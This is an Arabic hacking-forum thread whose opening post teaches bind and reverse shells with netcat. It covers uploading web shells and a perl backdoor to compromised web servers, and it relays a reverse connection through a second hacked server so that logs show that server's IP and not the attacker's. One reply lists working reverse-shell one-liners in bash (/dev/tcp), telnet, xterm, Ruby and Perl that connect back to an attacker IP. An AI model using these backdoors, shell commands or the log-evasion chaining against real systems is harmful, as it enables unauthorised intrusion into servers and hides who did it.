Backconnect , port bind + حل مشاكل الاتصال العكسى بطريقه شبه كامله

السلام عليكم
إزيكو يا شباب
الموضوع النهارده سهل جدا لكن فى نفس الوقت هام جدا جدا جدا
حط تحت كلمة هام دى ألف خط
الأول خلونا نتكلم عن الاتصال العكسى والاتصال المباشر باختصار
الاتصال المباشر
او Bind زى ما الكل بيقول عليه
مش بيحتاج انك تكوت فاتح بورت للاتصال فى جهازك او فى الراوتر
المهم يكون البورت مفتوح فى السيرفر نفسه
أمر الاتصال المباشر من النت كات هو
nc -n -v ip port

يعنى مثلا الكل عارف ان بورت المتصفح 80
لو حبيت اتصل بالسيرفر ده 192.168.16.30
يبقى هنتصل كده
nc -n -v 192.168.16.30 80
لو عملت الامر ده ع اى سيرفر هتلاقيه قال لك كده بالظبط
(UNKNOWN) [192.168.16.30] 80 (?) open
بس طبعا مش هتنفذ أوامر ولا حاجه
عشان تنفذ اوامر لازم تعمل bind من اى شل معاك
ممكن شل r57 شل sniper-sa او شل البيرل اللى هتشوفه فى الفيديو
انت اللى بتحدد البورت وانت بتعمل bind
يعنى فى شل البيرل اللى هشتغل عليه هتلاقى دى

شايف 11457 ؟
بتغيرها انت براحتك مش شرط تسيبها زى ما هى يعنى
وعلى الاساس ده هتستخدم النت كات
يعنى لو خليتها مثلا 5555
يبقى فى النت كات الامر هيبقى كده
nc -n -v ip 5555
وهكذا
ده نبذه مختصره عن الاتصال المباشر

نيجى بقى للإتصال العكسى
الاتصال العكسى لازم تكون فاتح البورت اللى هتتصل عليه فى جهازك وفى الراوتر تبعك
الامر تبعه بيبقى كده
nc -lvp port
عشان تتصل عكسى
لازم يكون فيه backdoor تكون انت رافعه على السيرفر
هوضحلك الامور ببساطه شديده
فى الاتصال المباشر اتصلت انت بالسيرفر كده nc -n -c ip port
تمام؟؟
فى الاتصال العكسى بقى السيرفر هو اللى هيتصل بيك :slight_smile:
بس كده
طبعا فيه كذا باك دور
انا غالبا بستخدم المرفقه دى
او اللى موجوده فى شل البيرل المرفق
لما تيجى تشغل الباك دور من السيرفر بتشغلها كده
perl backdoor.pl yourip yourport
نوضح الامر
perl backdoor.pl
لتشغيل الباك دور على السيرفر
yourip الايبى الخاص فيك انت
تقدر تطلعه من هنا
showip.net او اى مكان
Yourport البورت اللى انت بتتنصت عليه
يعنى انا مثلا نفذت الامر ده
nc -lvp 1337
هتبقى النتيجه عندى كده

بفرض ان الايبى تبعى هو 192.126.16.30
يبقى هشغل الباك دور كده
perl backdoor.pl 192.126.16.30 1337
وهتلاقى النتيجه عندك فى النت كات زى كده
connect to [192.126.16.30] from lab2 [192.126.16.112] 3000

******* ConnectBack Shell *******
طبعا الاتصال العكسى مش للمواقع بس
لا
ده أساسى فى الميتاسبلويت والأجهزه
وتشتغل عادى

دى نبذه مختصره عن النوعين
نيجى بقى للمشكله اللى بتواجه 85% من الناس
وهى مشكلة عدم القدره على الاتصال العكسى
زى ما قلت فوق مش كل السيرفرات بتسمحلك تعمل bind عليها
الاغلبيه العظمى مش بتسمح بالـ bind لكن بتسمح بالاتصال العكسى :slight_smile:
يبقى اللعبه بقى هى اننا نستخدم السيرفرات اللى بتعمل bind للاتصال عكسيا بالسيرفرات اللى مش بتعمل bind
زى ما بيقولو
نضرب الظالم بالظالم
ونطلع احنا بفايدتين
الأولى حلينا مشكلة الاتصال العكسى
التانيه التخفى لان اللى هيظهر فى اللوجات ايبى السيرفر اللى عملت عليه bind :slight_smile:
الخطوات :-
1- فى المرفقات هتلاقى netcat انسخه فى بارتشن ال c وسمى المجلد تبعه nc
مش شرط طبعا بس عشان تسهل عليك ما اكتر
2- افتح الـ cmd
start > run > cmd > ok
3- نفذ الاوامر بالتتابع
cd
عشان تبقى فى اول البارتشن
cd nc
لفتح مجلد النت كات
4- نروح على الشل اللى معانا ونعمل منه bind
5- نرجع للنت كات وننفذ امر الاتصال المباشر nc -n -v ip port
6- نرفع الملف المرفق بإسم nc على الشل
اللى عملنا منه bind
مش التانى :slight_smile:
ونصرحه 777 عن طريق الامر chmod 777 nc
8- نتنصت بالنت كات من السيرفر اللى اتصلنا بيه مباشر
./nc -lvp 1337
وليكن على البورت 1337 مثلا
9- نروح على الشل اللى عايزين نتصل بيه عكسى ونرفع الملف اللى اسمه back.pl
10- نشغل الباك دور كده
perl back.pl serverip 1337
مكان serverip حط ايبى السيرفر اللى اتصلت منه مباشر
وانتهى الأمر
مثال


صدقونى يا شباب والله الشرح سهل جدا جدا جدا
انا اتعمدت بس اطول فيه شويه عشان الناس اللى لسه مش فاهمين المصطلحات دى

ده شرح الفيديو
أو بتاريخ 13/02/2012
http://www.ziddu.com/downloadlink/18603166/backconnect_from_server_to_server.rar

ودى الأدوات كلها
أو بتاريخ 13/02/2012
http://www.ziddu.com/downloadlink/18603224/last.rar

ان شاء الله ننزل حل اسهل من ده
أى استفسار ان شاء الله احاول اكون موجود :slight_smile:
بالتوفيق يا رجاله
./faris

ياعمــــــــــي ابدعت مثل كل مرة والله الكلمات مابقت بارك الله فيك هذا اقل شي بحقك :slight_smile:

السلام عليكم …
شوف يا حج انا صراحة مش بتابع الدروس اشان شوي الانشغال هذا … بس صراحة صراحة يعني اول مرة اشوف بالعالم العربي مثل هاي الدورة من مدة كبيرة يعني … موفق يا برنس وابقا شد الهمه بالدراسه :slight_smile:

مايحتاج نرد عليك شهادتي فيك مجروحه

درس مهم جدا الله يعطيك العافيه

^
^^
^^^
^^^^

هو يقصدنى يا فارس ddd.

تمام اوى ياض

الله يخليك اخي فارس

ومثل ماقال علاء بصراحه افضل واكمل دوره في العالم العربي

تحياتي لك يابطل

ههه اكيد انت اولهم :stuck_out_tongue:

درس جدا قوي اخي فارس … اشكركك :]

شهادتي فيك مجروحه

اقوى دوره عربيه لحد الان وانا اشهد والكل بذالك

!

ياخي انت مبدع دائما تسلم الايادي اخوي فارس وعساك على القوة حبيب قلبي

جميل يا معلم جاري المتابعه اخوي موفق يا حلو ^^

هذه اضافة مني:

Reverse shell without netcat :

/bin/bash -i > /dev/tcp/192.168.0.100/1337 0<&1 2>&1

Reverse shell via telnet :

mknod bp p; telnet 192.168.0.100 1337 0<bp | /bin/bash 1>bp

Reverse shell via Xterm ( port 6001 ):

Attacker – :
Xnest:1
xhost + victim IP

Victim – :
xterm -display 192.168.0.100:1

Reverse shell in Ruby :

ruby -rsocket -e ‘exit if fork;c=TCPSocket.new(“192.168.0.100”,“1337”);while(cmd=c.gets);IO.popen(cmd,“r”){|io|c.print io.read}end’

Reverse shell in perl :

perl -e ‘use Socket;$i=“192.168.0.100”;$p=1337;socket(S,PF_INET,SOCK_SREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(SRDIN,“>&s”);open(STDOUT,“>&S”);open(STDERR,“>&S”);exec(“/bin/bash -i”);};’

ممم و في اداة الweevely للاتصال العكسي ولكن بحياتي لم اقدر احصل على رووت منها يعني النت كات بيظل احسن

شكراا اخي بس ياليت ترفق الادوات لانه كل الروابط اختفت

http://www.sec4ever.com/home/showthread.php?t=13389